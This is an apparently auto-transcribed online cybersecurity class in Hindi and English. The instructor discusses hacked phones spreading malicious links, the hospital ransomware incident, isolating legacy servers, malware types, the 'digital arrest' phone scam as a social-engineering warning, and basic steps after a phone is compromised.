उसको दिन भर में अगर 100 लोग मिल गए इस तरीके से, उसका काम तो हो गया।
एंड वैसे ही सेम मेरे पास मैसेज आया था मेरे दोस्त का, न्यू फ्रेंड रिक्वेस्ट। वो तो मुझे पता था कि न्यू फ्रेंड रिक्वेस्ट है, वो उसने दूसरी आईडी बनाया नहीं, तो मैं ऐसा करता नहीं। बट मैं ये पूछ रहा हूँ, जैसे मेरा एग्जिस्टिंग ही फ्रेंड है उसी की ही, मतलब जैसे मान लो जैसे मेरा हुआ था ईमेल आईडी डिस्कॉर्ड के थ्रू, जैसे मैंने आपको बताया, उसी में से ही मेरे को मैसेज आ रहा है।
किस वजह से मैं, अच्छा उसी तो वो नंबर तो अलग है ना?
हम्म।
तुम्हारा नंबर थोड़ी मास्क कर लिया है उसने।
नहीं, मैं ये कहना
हाँ।
चाह रहा हूँ, जैसे किसी का डिवाइस हैक हो जाता है ना, या फिर किसी एंड्रॉइड्स हो जाते हैं। एंड्रॉइड्स में
हम्म,
क्योंकि एक्सटर्नल एप्लीकेशन डाल सकते हैं आराम से बिना किसी दिक्कत, एपीकेस के
हम्म,
थ्रू
हम्म,
या फिर
हम्म,
अदर वेबसाइट्स। तो
हम्म।
इफ their phone got hacked, so अटैकर कैन ट्राई ना कि उसी की डिवाइस से वो आपको लिंक्स एंड फोटोज भेजे, तो वो आप क्लिक करोगे और ऑब्वियस बात, आपका नोन सेव्ड है वो, तो आप देख सकते हो। आई एम आस्किंग दैट थिंग।
नहीं समझ में आया क्या कहते हो।
सर, बेसिकली आपका डिवाइस हैक हो गया है, मान लो।
मेरा डिवाइस हैक हो गया, मोबाइल हैक हो गया, ठीक है।
जी। एंड आपके डिवाइस के थ्रू आपके सेव नोन पर्सन को आपके मैसेज
अच्छा,
भेजा जा रहा है, बस
ठीक है,
आपको नहीं
मेरे
पता।
मेरे मेरे डिवाइस से मैसेजेस जा रहे हैं, मेरे दोस्तों को नहीं
जी
पता है, ठीक है।
जी। बस आपको, आपने मैसेज भेजा पर आपको नहीं पता है, और वो मेलिशियस है, ये फोटोज और
हम्म,
लिंक जो भी है, बट वो तो लिंक वो तो खोल लेंगे ना, क्योंकि उन्हें पता है आपके थ्रू आ
बिल्कुल,
रहा है।
बिल्कुल खुलेगा।
वही मैं पूछ रहा हूँ।
क्या पूछना है इसमें, पूछना क्या ये तो बताओ, ये
वो तो
तुम।
वो तो खोलेंगे ना, तो उनका
हंड्रेड
डिवाइस भी तो एक
परसेंट
तरीके से हैक हो जाएगा ना।
बिल्कुल हो जाएगा, यही तो है, इसी को तो कहते हैं। नाम नहीं याद आ रहा मेरे को। इस अटैक का भी एक नाम है। मुझे नाम नहीं याद आ रहा मेरे को।
तो डिस्कॉर्ड में सर वही तो होता है मेरे साथ, कि मेरी ही आईडी से दूसरों को मैसेज
इसको
लिंक और
इसको
फोटोज भेज रहे
देखो,
थे।
इसको इसमें हुआ क्या, इसमें दोनों चीजें हुई। पहले हुआ रिमोट कोड एग्जीक्यूशन, जिसमें तुम्हारा डिवाइस अटैक किया गया। फिर तुम्हारे
हम्म।
डिवाइस के थ्रू उसने कमांड एंड कंट्रोल किया, तुम्हारे डिवाइस के थ्रू जितने भी डिवाइसेस और हो सकते हैं कनेक्ट, सबको उसने किया। अब इस अटैक का नाम भी एक है, मुझे याद नहीं आ रहा है। बहुत पॉपुलर अटैक है, माइक्रोसॉफ्ट के सर्वर पे हुआ था एक बार, बेचारे परेशान हो गए थे। तो ये डेंजरस चीजें हैं ही। अपने डिवाइस को बचा के रखने का एक ही तरीका है, कोई भी थर्ड पार्टी एप्लीकेशन जो तुम्हें लगे कि अरे बहुत अच्छा है हम डाल लेते हैं, कुछ इसमें काम आएगा, कभी नहीं करना चाहिए। डू नॉट इंस्टॉल एनी सच टाइप ऑफ एप्लीकेशन इन योर मोबाइल डिवाइस और इन योर लैपटॉप which is unauthorized, providing an unauthorized platform. Some friends, what they are actually telling, I got a good game. Someone sent me a link, through that I am actually downloaded a nice game, and that particular game is very costly, but I am sending you free of cost. You will download it free of cost.
Yeah.
So they send you the link, and when you click on that link, that particular application or the game, whatever it is, it will be download. There are so many applications are also there which is providing very nice features over there, like you can able to create the videos, edited videos over there with a very simple format. But when you download that particular application, at that time also it is asking you, are you uh, ready to install it? Are you ready to download it? Are you confirming it? It is asking you, but you are not bother about it. You are only bother about it. Just download it, and I want to see it. But that is the thing. Your mobile device has been hacked. That is simple thing. One of my friends sent me a particular link. He told me that it is a very good game, download it. So when I click on that link, it is asking me, you are giving me the authority to download it. So I certainly I got it that it is not the right thing. I revert back him that do not download it. So he is telling, not an issue, download it, nothing would be happen. I'm playing the game. So it is very dangerous. Do not download any particular application from unauthorized websites. Do not download any APK files. Do not download any exe file. Always download from the authorized location. Okay. Then also your device is always in threatened, because near about, you think so, in a particular year, how many attacks do you think, how many attacks has been successfully done by an attacker in India?
Maybe 1,000.
Maybe 1,000. But are you ever in a day, in a particular day, how many attacks is actually conducted by an attacker?
Maybe 100 or 200 something, somewhere
Think
around.
millions of attacks
In a day.
in a day.
An attacker.
Yeah, 1 million, how many stuff is there? 10 lakhs, 10 lakh
10
attack
lakhs,
on.
10 lakhs.
So the probability of an attack is very less. But whenever the attack is actually successfully happened, uh, it will make a loss, a huge loss to the organization. The millions of after millions of attacks, 10 or 20 attacks has been successfully done in a year. But those attacks are also very dangerous, like your AIMS attack is there. Okay. Sometimes so many bank servers has been hacked, but none of any bank is going to tell you that our bank server is attacked or not. Okay. Uh, I am actually seated over somewhere. At that time, I got a call, and it is from a bank, and they are actually telling me that our particular server goes hacked. So what we have to do? What kind of attack is this? You have to send someone quickly. So they are not telling in the phone that what exactly happened. They actually send that air ticket to me. So I send a particular person over there. He go there, then he look after it, and each and everything would be happen for 7 days. the bank is in the critical position, but they are not get that news outside. None of any newspaper, none of any news channel, it will broadcast it that the what particular happened in the bank, how much data is loosened or how much amount of money they are actually lost, because it will damage their credibility. So many times the bank servers are being hacked, but they are not telling anyone. They are actually by itself they are um, compromised it. They are actually hidden those things so that the credibility would not be damaged. Okay, so many attacks we didn't know about it also. But whenever the huge attack which is actually related to the consumers, so that we that that type of attack is suddenly being published over the market. Like in Ames Hospital, what happens? An attacker is actually encrypted the database of all database of the Ames server, Ames hospital. So none of any doctor would able to at that particular hospital what is the software they are running in their hospital. Okay, and each one of the doctor has an application on its tablet. So they are actually looking after the patient. So in that particular tablet, they got the messages or they and in the particular application they are actually send the messages that in this particular bed number, this patient name, the patient name is this one, and you have to visit there. When the doctor visit that particular patient, again in open the application, and he will whatever the thesis he is actually looked about that patient, he will mention there, and he will prescribe the medicines from there also, from there only in the application. Then after that, the particular patient's relative who were there, he actually go there in the medical store of the Ames and only define that the bed number is this one. And in the application, he opened the bed number, or it will show the patient name, the doctor name who visited him, what is the cause of, what are the causes, and what is the prescription. Each and everything is there. So each and everything is actually sent it by an application which is in a network. So if the data is encrypted, then no one can able to access a single thing. So a doctor is also not able to get to the patient. They are not sending, they are not receiving the message that in this bed number you have to go. Nothing would be, the movement should be there. So after 2 3 hours, it is recognized that something is not getting good over there. Because patients are roaming in here there. He is actually shouting that no one is caring about us, no one is looking about it. But what they will do? So at that time, they each and every person, the particular director of the Ames, they decided that we have to tell to the media that our server goes crashed. It is actually down. So what they will, they didn't tell anyone after that. Is they given the ransom amount to the attacker, what exactly they had done. They didn't provide the information out. So there are
सर
sometimes.
सर जैसे किसी को अटैक करते हैं किसी को, और वो अटैकर बिटकॉइंस में मांगता है, तो वो बिटकॉइंस में रैंसम मांगता है, बट हमारे पास तो होते नहीं बिटकॉइन, या किसी के पास भी, किसी भी अथॉरिटी के पास भी होता नहीं है बिटकॉइन में। तो वो पेमेंट अगर कोई करता तो कैसे करता है, और नहीं करता तो उससे बचा कैसे जाता है अटैक से?
देखो, they will ask you the Bitcoin, but if you do not have the Bitcoin, then they will tell you go and purchase the shopping carts of Amazon shopping carts, of Flipkart shopping carts, the Apple shopping carts. It is provided over the internet also, in the store also. So purchase those shopping cart, and that is in a digital form, and they will tell that this particular digital card and the shopping cart and send to me. That's it. Purchase that particular shopping cart with my ID. He will give you the ID also.
तो उस अटैक से बचा नहीं सकता, रैंसम अटैक से बच नहीं सकते अगर हो जाए तो किसी भी तरीके से?
It is actually depend upon the criteria which type of attack is happened, which type of attack is done by an attacker. If they have a chance to stop that attack, or to stop that attack in the middle also. If suppose that in a server they done an attack and they successfully done the attack, but whenever the attack happens, the cyber security team is if initialized that the attack is going on, then he can able to stop that attack in between it. So when the attack happens, suppose that 20% of attack is successfully happened, so 20% of data is only leaked. The 80% is safe. So at that time, they are not bothered about it. But if their whole database would be encrypted, then it is very typical.
सर एक केस है, अगर किसी कंपनी या फिर किसी अथॉरिटी का डेटा जा रहा है और वो उसे रोक नहीं पा रही डेटा को ब्रीच होने से, एंड वो कंटिन्यूअसली जा रहा है, आप उसे रोक नहीं पा रहे, ब्रेक नहीं कर पा रहे, तो हम ऐसा कर सकते कि उस डेटा के साथ कोई वायरस या मैलवेयर या कुछ भी ऐसे डाल दे ताकि वो डेटा उसके पास जाएगा भी तो भी क्रैश हो जाए और वो रिवर्ट बैक हो जाए।
हाँ पिक्चर देखे हुए हैं नहीं, ऐसा नहीं होता है भैया। अटैकर अपने पास बहुत सारे रखता है चीजें कि जो फाइल वो पुल कर रहा है ना, वो फाइल में वायरस नहीं होना चाहिए।
सर आ गया बस मेरे दिमाग में एकदम से।
ऐसा थोड़ी ना होता है भैया। अटैकर जानता है इन सब चीजों को, से नहीं है। वो भी फिल्टरिंग सब लगा के रखता है, उसको भी सब कुछ मालूम, उसको उसको भी नॉलेज है।
तो सर अगर डेटा वो हम ब्रेक नहीं कर पा रहे उस ब्रीचिंग को, तो हम कुछ नहीं कर सकते उसमें, डेटा ब्रीच हो रहा है अगर
If
किसी।
we initialize it that the data is actually breached and 10%, 20% of data has been breached out, so the simple thing is cut the network. That's it. Then after that we will see what we have to do. That is the only chance with us, because if the network is there, if the internet is running over there, then we cannot able to stop it, because that is a 0-day attack. It is called as 0-day attack. There is a loophole is there in my machine, but where is that exact loophole is, we didn't know about it. In which application the loophole is there? We are running so many applications in my machine. So if we do not know what exactly the malicious thing in my machine is, how we can able to stop it? So it is only way we have to cut that machine from the internet. You heard about the name Seva Bhavan?
हाँ हाँ।
What is that?
नाम सुना है बस।
Seva Bhavan is exactly cyber security space of the army space. Okay. So in there, they are actually using the servers or whatever the devices which they are using over there. They are not connected with the internet. Each and every devices are in a LAN network only. They are not going to expose their particular network over the internet. So whenever the armies or the navy or the air force, these kinds of government bodies, they are actually getting their infrastructure isolated. They are not exposing over the internet. Okay. Then if we talk about the organization, their legacy operating systems. Legacy systems means in the systems where they are using old operating systems. The old operating system whose updations or whose support is actually stopped by the service provider. If we take an example, suppose that Microsoft. So for Windows 10 is the client operating system. If we talk about the server operating system, Windows Server 2012 operating system is there in a organization, and that is a crucial database server is there. So each and every time the organization is very worried about to update or upgrade the operating system in the existing machine. So what they are doing, they are not updating their operating system. Whatever the operating system is running in that particular data management tool, they are running that operating system continuously. Okay, but those are the legacy machines. They are always been in a unsecure way because the updations are not be provided by the Microsoft. So updation patches are been not there. So the security loopholes are there. So what they are actually doing, they are actually cut off that particular server from the internet. They are not providing those machines exposed over the internet. So that is the
Oh,
best chance for them. So they are only providing a LAN network over there. So in the firewall, they provided the permissions and the rules. They do not provide the internet connection on those machines. So if the internet connection is not there, then the attacker is not able to. They are thinking that one. But if someone attacker is actually attacked on a particular machine in an organization and he is actually using that particular machine so what exactly the big organizations are actually doing, they are actually cut off the LAN network also from that particular machines. 24 into 7, they are not providing those machines over the LAN network also. Not internet, not in a LAN network also. Whenever they want to use those particular database server, then only they are actually exposing in the LAN network with a high security. High security means the physical securities are also been very enhanced. No one is get inside to those particular servers. And whenever the LAN cable is inserting that in that particular machine, they have to authorize it by the emails. So this is how the organizations are working on with their legacy operating systems.
okay, sir.
Because these kinds of stuffs we are actually telling to the organization whenever we are going to do the audits. So we are asking each and everything, how many servers in your organizations are, so how many servers are legacy operating system you are running, so how many ports you opened for this operating system, how many for how many duration you are actually exposing these servers over the internet. So each and everything we ask. Then after that we will suggest so many things in the documented way. So like these, follow these steps to secure your legacy operating system. So these are the policies which we are providing to the organization. So follow this way. So that also then they then they will ask, is 100% surety is there that we cannot be hacked? Some customers are telling asking us that whatever you are saying, if you are 100% sure, then give me the 100% surety in return. So we are saying to them, okay, we will give you a written commitment to you. You do one thing, you remove each and every human being from here, each and every employees from here, and replace them by a robot. Then we can give a written statement that the 100% safety would be there. Because if the human is there, then the human error is 100% been there. The human error is always been there if human is working in a particular environment.
Sir, if machines are deployed, then क्या 100% श्योरिटी की कोई अटैक नहीं होगा?
हाँ, तो मशीन्स को तो जितना बता दिया गया, वट एवर द मशीन्स हैड बीन प्रोग्राम, दैट मस्ट स्टफ इज ओनली बी डन बाय देम. If machine is, if I program a machine and tell to the machine that you only have to suppose that you programmed a machine and you program a machine and tell them that no one can except you itself, no one can able to enter to this room. So is machine would be blocked by anyone? No. But
No, sir.
if I am sitting over there and there is a strict instruction by the organization that no one can able to enter in this cabin, but but there is a chance, but by chance what happened, one day my friend is came over my office, so I will done a human error.
Yes, sir.
Yeah, so that is the
Yes.
difference between the bot and a human being.
Okay, sir.
Okay. So I'm starting with a topic, virus and worms. Okay. So actually, this is actually called as a malware. Okay. So what is exactly the malware is? Malware is a malicious software that damage and disable computer system and gives limited or full control to a system to have malware created for purpose of theft and fraud. And there are so many types of malwares are there, like viruses, worms, trojans, ransomware, spyware, okay, keyloggers. So these are the types of malwares. So these may delete the files by these malwares. These may delete the files, and they are able to slow down your computer. And some viruses are there which can be able to steal the personal informations, uh, sending the spams. Okay, so malware can perform various malicious activities, from multiple email advertising and do the password stealing. So these kinds of stuffs had been done by the malware. So if the malware programmer developed the malware, so why they are actually developing the malware? Malwares are developing to do the attack browsers, attack the visited websites, okay, slow down your systems, degrade your system performance. Sometimes they are actually doing the conducting the hardware failures and stealing the personal information, stealing your contact informations, erase your valuable information, deleting your information. Substantial data loss would be there. Attack additional computer system directly, compromise your system, spamming inboxes. So these types of attacks would be done by the malwares. Different way for malware to enter to your system. First is messengers application. Okay, so infection can occur via instant messenger applications like Facebook Messenger, your WhatsApp Messenger, your LinkedIn Messenger. So with the help of these messengers, users are at a high risk while receiving files via instant messengers, like I told you earlier, like your image file, like your text file, like some malicious links would be sent via these messengers. So most of the users, we are actually related to the IT industry. Okay, we are learning about the IT softwares, hardwares, about the devices, what are the vulnerabilities are been there in a particular device if I click on a particular link. So we are actually working around the IT, so we know so much things. But except IT persons, if a person who is a non-IT professional, so what will happen? You heard about digital arrest? You heard about the word digital arrest?
No, sir.
No, you do not know about the digital arrest scam. No one. See, a scam would be done by attackers from past, I think so, 6, 7 months earlier. A term they are using, that is digital arrest. So how they are actually doing? They are not actually attacking on the device. They are actually attacking on the human mind. Uh, I'm giving you a brief what exactly the digital in the digital arrest the actually attackers are actually doing. Suppose that you got a call from a particular um, mm, telecom industry. Okay, you got a call from a telecom industry. They are telling you that you are actually running multiple numbers. Okay, and we are actually suspend your current mobile number in which we are calling you. That is your permanent mobile number. So you will ask him why you are actually going to suspend my number. So they will tell you that you are also running one more number with the same ID proof. Okay, and in that particular number, you have done the malicious activities. You actually sending. mm, you are actually calling so many persons and blackmailing him. Okay, and we got a complaint by particular that particular number, and the file is and the case is also registered from the on this particular number is, and the FIR is also launched. So that we got a call from the police station. Wait a minute, guys. Okay. So they are going to tell you that the FIR is launched in this number and this number is related to you. So how many of you believe that your number is suspending?
I will not.
Why you will not?
सर क्योंकि मेरा नंबर है तो मुझे पता
What
होगा कि
will
कैसे
what will you ask to that party, to that person?
फॉर प्रूफ
Hmm?
एंड अगर वो डिजिटल प्रूफ देता भी है तो एक बार फिजिकल जाके प्रूफ चेक करेंगे.
No, no. They will tell you that I am calling from Delhi. And they know that you are not belongs to the Delhi. And they also tell you that the number is also registered from the Delhi. Then what will you ask?
About their details.
Whose details? From the telecommunication department, and they are telling you, I am just now, I am suspending your number, and and the FIR is also launched, and they are actually you have to get over there in Delhi and present in the court. What will you say? What will you ask? The first question, what will you ask?
I don't know. Ravi, I don't know right now.
So many peoples are there, so many persons are there who will get on this. I got this kind of call. I suddenly ask him to that particular the person who is telling himself that he is a person who is calling from the telecommunication department. I ask him, what is the procedure to buy a SIM? Tell me. Because I told him that I never been there in Delhi from past 5 years. So how it is possible that past 2 years before a person uh, purchase a number with my ID proof? So he told me, no, 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 it is possible you actually given the ID proof to someone, so that would be misused by some person. So I asked him, tell me the procedure, what is the exact procedure to buy a SIM? So he told me, what is this, what you actually want to know? I told him, I want to know what is the procedure. Is there is a procedure that someone is go with my ID proof and he can able to allot a SIM with my ID proof with my name? Is it possible? What is the procedure? Then I tell him the procedure is that If I want to purchase a new SIM, then I have to go to a particular telecommunication service provider's official showroom. Then there I have to punch my fingerprint in their biometric. It is not like that I am taking a particular photocopy of my ID proof and he will give me a SIM. That is not a way. Then after that I tell him, okay, do one thing, go with your FIR and send me the summon to my home. I will present in the, because I know the particular criteria, the way how the things are being moving on. But most of the persons in our India, they do not know about it. So what they are exactly, they will whenever they listen that the FIR is launched, they will suddenly worried that I have to go to Delhi, then I have to present in the court, I have to move to the police station here and there. So what exactly the person is actually going to tell to the person who is calling, he tell him that I am unable to come there in Delhi. So look after in this matter. I do not stop my number. Just see what you can able to do. This is their first task. Okay, this is their first task. And after that, if the person tell me the suggestion, give me the suggestion, look after this matter, then he directly connect. He will tell you, I am connecting to you a particular police station IO. Okay. So he will connect the call to a particular police station. They telling you, then the call will be transferred. Then the person would be there. He will ask you, what happens to you, why the call is actually connected. Then you will tell him that this happens. My number is actually fraud by the person, and so many things you will tell him. Then now see what he is actually telling you. Now the second step would be going on. He will tell you the particular police officer who is actually acting as a police officer. He will tell you, okay, do one thing. I am calling you a video call. Take a call. When the person is called you in a video call, the person is actually sitting over in a police station. The two flags are behind him. He is actually wearing a police officer's dress. So look and feel of the environment is very much original, and he will also, the customer is also being affected or impacted that okay, he is a police officer, he is actually a genuine person, he is a genuine police officer. I am not being uh, trapped by anyone, or no one is actually fooling me. So that kind of environment he is actually created over there, and he is actually showing you by the video call. Then after that, he will tell you, okay, I am cutting my video call. Now I am calling you in a uh, audio call. Then he will ask you what will happen, how it will happen. Then he will slowly, he is actually asking you your details, like send me in a particular number. He will send you a number and tell you, send me your Aadhaar card in this number, send your driving license in this number, send your bank account passbook details on this number. So slowly, he will actually asking you your informations. Then after all the information when he got, then he will say, give me 10 minutes, wait for 10 minutes in hold. I'm looking into this matter. Then after 10 minutes, he will tell you कि some kind of fraudsters had been happen in your account. In your particular Aadhaar card, some more accounts are been running on. And in those particular account, most of the money has been transferred illegally through other countries. So this case would be higher than the mobile scam. Now you are convicted for the money laundering. Now I am not able to do anything. I am launching an arrest warrant to you. So the person could worried more. So what he will do, he exactly tell them, no, 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 sir, I am not the person. I am not doing anything illegal activity. Those are not my account number. But the particular account number, they already know. He already know because you send all the details to him. But they are fooling you that there are some more account number with your name, with your Aadhaar card is actually linked and running. This is their next step. Then they are telling him, okay, I am favoring you. I will do one thing. I am going to do. I am. I am actually doing the digital arrest. I am getting you with the digital arrest. Digital arrest means what they are actually telling to the victim. Digital arrest means now wherever you are, go directly to your home. Do not talk to anyone. You are uh, in your home, you are staying with some more persons. Get inside to a particular room and lock that room. Now you are not going to talk to anyone, and install the spike. Skype is there. Skype is there. They are telling to the persons, install the Skype, and you are connect with the video call to me. This is how they are actually doing the digital arrest. Okay. After the digital arresting, for 2-3 days, the particular person is harassing him or her. And slowly, he is actually, after the harassment, he is actually, at the last, he is actually
हेलो सो आपका नेटवर्क
assets and
नहीं आ रहा, आपकी स्क्रीन नहीं आ रही है सर।
wait a minute. I don't know how my aeroplane mode has been on. Now my screen is visible.
यस सर।
Actually, I don't know how my aeroplane mode is enabled in between the class. So the Wi-Fi is turned off. That's why the meeting has paused. So where were we? He actually
तो स्काइप
after okay Skype. So he will tell him that kindly install the Skype in your machine, in your device, in your mobile device, and go to your home and do not talk to anyone. You 24/7 you have to on the video call. Only when you are using the washroom, then only at that time period only you can able to use it. But at that moment you have to put your mobile phone outside from yourself. So 24/7 he is monitoring him. Slowly he is actually doing the mental harassment to the victim. When the victim is collapsed fully, at that time victim asked him, do one thing, kindly do some any other thing except this video call so that I will able to move on it. So at that time, the person tell him, okay, do one thing. I am giving you a RBI account number. Go to your account, each and every account. Now he know each and every account of that particular person because he itself given to him. Now go to in these accounts, whatever the amount in these accounts you have, whatever the FD which is actually here with you, because he know each and everything. Go and submit all the amount to this account number, transfer all the amount to this account number. This is RBI account number. Now we will, after that, for 3 days, we will initialize each and every amount, whatever the amount you are sending, we will initialize it. If the amount is not being sent it through any other country, then we will revert back each and every amount to your account. So person exactly Going to the account itself, he is sending amount to the particular account number, and when each and every activities would be done, then they are move on. And when this particular attack is known in by the government, you know, the caller tune has been changed at that time. The caller tune is changed automatically. Whatever the caller tune you set it is changed, and the government set a caller tune that there is a foster who is actually calling you. They will tell you that police is calling you, or the advocates is calling you. You are in a digital arrest. So no calls and kindly save there. So this is a very dangerous attack which would be happened 7 months before. So in this particular pattern, none of any device is actually hacked. They are hacked their mind. Okay, this is called as social engineering attack, in which the attacker is actually manipulating the person. And in this attack, they are most of the people who is actually got digital arrest, they are actually sended crores of rupees to the account, whatever the account they actually tell him to move on. So this is not like that no one is know, because we are from the IT industry, we know each and everything about the devices, about the technology, what exactly the new technologies are running in the market, how the users are actually using those technology. But most of the people in India, like 70 to 80% of people in India, they do not know even how to use the mobile phone properly, the Android mobile phone. They are actually using to do the Facebook, something in Instagram, listening the music, watching the YouTube. That's it. They do not know anything about it. So whatever they are sending in the mobile, they are actually opening up in the villages. You look after the villages, they are also using the Android mobile phone. Do you think they aware about everything?
No,
So
sir.
it is very dangerous. We are actually in a trap, and anyone can able to trap us and exploit us. This is a digital world, and it is a very dangerous thing. In
Sir,
each and every person, they are using Android mobile, they are all, and the Android mobiles are in the market. It also costs around 8 to 10,000 mobiles are also available in the market, which cost 8 to 10,000 rupees. So the availability of the Android mobile is also there. So each and every one is actually buying those mobiles also. And
sir,
when this digital arrest word is goes viral over the internet, so at that time the government is also come in the front and tell to the citizens, told to the citizen that digital arrest kind of thing is not there. We are not in a law, in Indian law, digital arrest kind of thing is not there. No one, if a original police is also telling you that we are doing the digital arrest, it is not possible. We do not have the law which provides us digital arresting. The government tell to the people. After so many struggle, all these kind of the digital arrest is actually stopped. So there are so many social engineering ways by the person is actually doing the digital arresting. I actually told you one example. There are so many examples are there why they are actually doing the digital arrest. Because people are not aware about anything and they actually worrying suddenly.
सर बट एट द एंड वो मनी ही तो मांग रहे हैं अपने अकाउंट में ट्रांसफर करने के लिए तो
Not they are telling that this is the RBI account. They actually so much humiliated them and take a confidence that whatever I am saying, that is the right thing.
ओके
Okay. Yeah.
तो बेसिकली
because
सर जैसा
because past 3 4 days whatever happened to him, they just not even demand a single penny from the person. They tried to bargain him that if you want something, I'm able to give you, but they are actually humiliating him. No, what you are thinking, I'm here to make the money, so and so, this and this. So at last, when they are asking that this is the RBI account number, you have to send all the money to this account number, they are actually convinced him. They know the person is convinced. Now, whatever we say, he will do.
Yeah.
But it is not like that. Each one of us is actually get in that trap. They are calling near about in a day, hundreds of people they are calling, and 1 or 2 people is get into the trap. That is okay with him, because we have 140 crore population is there. On the daily basis, 100 calls are being generated. So how long it took place to call 140 crore peoples? So that's why it is very critical. Okay, one more thing. How many of you have doubt that CS certification is only for 1 year validate? It is only 1 year validity.
Yes, sir.
No, I'm telling you, actually,
Yes.
CH actually providing the certification for 3 year validation. Okay, so no, do not worry about it. They are actually providing the certification for 3 year validation. Okay, none of any organization is actually providing the certification for 1 year.
Yes, sir. Even most certification I see they are for 6 months. Most companies
No, no,
six
no, no,
months 1 year.
no, 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 no. Don't worry about it. Easy. See, okay, fine. EC Council CS certification is valid for 3 years from the date of issuing. So do not confuse it. Okay. It is actually providing for the 3 year validity. And after that also you can able to renew it after 3 years. Okay. So right now, if it is 2026, so 2026, 2027, 2028, now you have to renew it 2028. If you are doing the certificate in 2026 February, then you have to renew it on 2029 March. This is till this year validity is there.
sir, how can we renew the certificate?
That procedure you will actually the EC Council directly send you the mail, and he will propose you how to renew it. This is not our duty. This their duty is it is. Okay.
सर एक क्वेश्चन है, जैसे अगर किसी पर्सन का डिवाइस हैक हो जाता है एंड उसकी फोटोज एंड मीडिया चैट सब लीक हो जाती है, तो जो हैक डिवाइस है उसे बचाया कैसे जाता है, और जो लीक डेटा हुआ है उसको जो फैलने से बचाते हैं जैसे साइबर सेल्स होते हैं, वो कैसे होता है? मतलब उसको बेसिकली डिवाइस अगर हैक हो जाए तो बचाएं कैसे
इनके
उसको?
पास देखो, डिवाइस अगर हैक हो गई है, ठीक है, तो सबसे पहले तो यही पता करना है कि डिवाइस हैक है कैसे हुई है, हाउ how the device has been hacked. So what is the malicious application is there in my device? First, we have to identify it. Okay. So for this, it is actually done by the forensics method. Fine. Now, the second question is how the particular data, whatever the data is leaked over the internet, how we can able to protect it. Okay, so from by which particular websites or the portals the exact data is actually leaked. Suppose that in your Instagram or in your WhatsApp, or suppose that in your Telegram the data is leaked. So you, if the data is very confidential according to you, so you may report in the cyber cell. Then after that, cyber cell will contact to the Telegram directly, and he will tell him that remove each and every photo and picture, whatever is there in your database. You have to delete from there. This is the method. Okay, we do not have the rights to do anything because it's their database, it's their policy. Who's the organizations? So who will instruct them? More powerful than that organization. That is government. So government has the full authority. Fine. Suppose that if you are
So
using the VPN, if you are using VPN, suppose that I am using the VPN and I have done an attack in a particular victim. Okay. So when the forensics are been doing, at that time he will got an IP address. At that IP address, he will relate it that which VPN has been used by an attacker. So then he will call to the VPN. He will send a mail. He will send a mail to that VPN service provider and ask each and every detail about that user. Tell me from which location, exact location, because VPN service provider has each and every detail about me. At the time when I connected to my internet connection and I use the VPN, each and every information about me, he got that information. And the cyber cell is asking those information from the VPN service provider.
so in this case, what a normal person can do?
Normal
That
person.
basically जैसे ज़्यादा
What
पता नहीं है, but पता भी है.
whenever you got such kind of call, anyone, suppose that one more kind of call is actually running on, he will the person called you and directly told you that I am a police officer and you are doing the illegal activities. I know that, so I am going to arrest you. So simply tell him, arrest me. That's it.
No,
Because the
sir, this
procedure
was
of
not the question. I was
uh,
asking about
okay, the phone hacking. So what you have to do, if you know that the phone has been hacked, so suddenly you have to turn off your mobile phone, switch off your mobile phone. First thing you have to do. Okay. Then be calm, sit quietly, and uh, memorize it. What exactly the application you exactly installed previously 3-4 days before. When you got the exact applications, 3-4 application name you remembers it. Now turn on your mobile phone, remove those applications on the spot. So 80 to 90% is there that those applications are actually open the back door in your mobile. Sometimes the Play Store mobile phones are Play Store applications are also open the back doors. How? By the games. Okay, so games, the online games nowadays, the online games are very popular. You know that with the mobile, with the online games, whatever the online games is actually providing by the companies, they provide a chatting feature over there.
yes, sir.
Now, how do you know the person who is actually chatting with you? He is a guy or he is a girl. What is the age of that particular person is? He is telling truth to you or false to you. How will you initialize it? And most of the time, they are actually targeting the children's. Suppose that my son is there. He is actually using my mobile phone, and without my knowledge, he download a game from the Play Store or from or some particular third party link. Okay, some of his friend is actually send a particular link in the WhatsApp and told him kindly install this application in your mobile. So he do not aware about the things. He just install it. Then he without my knowledge, the application is actually installed. Now what will happen?
डेटा मतलब हैक बैकडोर खोल देगा उसमें ताकि अटैकर
Huh?
अटैक कर पाए. बैकडोर खुल जाएगा उस
चलेगा,
लिंक और ऐप के थ्रू?
खुल जाएगा। मुझे नहीं पता चलेगा क्योंकि मैंने तो इंस्टॉल किया ही नहीं है। I never installed that application. Application installed by my son. He never told me because he do not aware about it. I think so. He also forget about it that he installed some application in my mobile phone. Okay. So never give the mobile phone someone else except yourself.
Okay.
किसी को नहीं देना है. Never give your, because mobile phone is not a simple device. It is actually contain each and everything related to our uh, daily uses. Like our bank account is also linked with my mobile number. So each and every OTP is sending to our number. Our mobile internet banking is we are using. So all the application related, the blanks are installed. Google Pay is installed. Phone Pay is installed. So it is very dangerous. Our social media account is installed. So if the mobile phone is someone I am giving them, he actually opened the Facebook account and he sent the friend request to himself. What will you do? He will accept it. Suppose that your Gmail account is actually opened there. He get into there and he changed the password of your Gmail account and simultaneously he log in with your email ID with its mobile phone. He got the OTP. OTP is in your mobile. Within 1 minute, he can able to log in with your Gmail ID in its mobile. So it is very dangerous. So people are not aware about it, how to use their devices, because I already told you 80 to 90% of people are not aware about it because they are not aware about the IT psychology, how the information technology is actually using, how it is dangerous, how the information is very critical. Okay, your photos, pictures, video file, audio files, these are also the crucial things. Who know what exactly is stored in your mobile? Luckily, he got some images, some videos from your mobile. That is dangerous to you. So it is very critical. So if something hacked, just turn off your mobile if you know it, and try to remember what exactly you had done with your mobile for 4 days before from the attack. So if you memorized it, then you can able to remove those application. The backdoor will be stopped.
Okay, so
Yeah.
yeah.
Okay. So do not confuse it. The certification is of 3 years. Okay. Don't afraid about it. So we will continue our class tomorrow.